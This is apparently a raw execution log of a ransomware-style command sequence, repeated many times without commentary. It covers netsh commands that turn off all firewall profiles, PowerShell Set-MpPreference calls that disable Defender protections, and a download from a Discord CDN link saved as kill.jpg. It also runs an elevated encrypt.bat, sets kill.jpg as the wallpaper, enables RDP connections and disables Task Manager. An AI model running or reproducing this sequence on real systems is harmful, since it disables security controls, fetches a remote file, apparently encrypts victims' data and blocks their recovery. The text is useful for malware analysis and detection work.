C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

